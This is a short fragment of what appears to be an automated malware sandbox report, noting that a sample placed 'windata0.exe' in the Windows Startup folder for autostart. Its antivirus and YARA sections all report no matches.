13:36:17AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windata0.exe

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Screenshot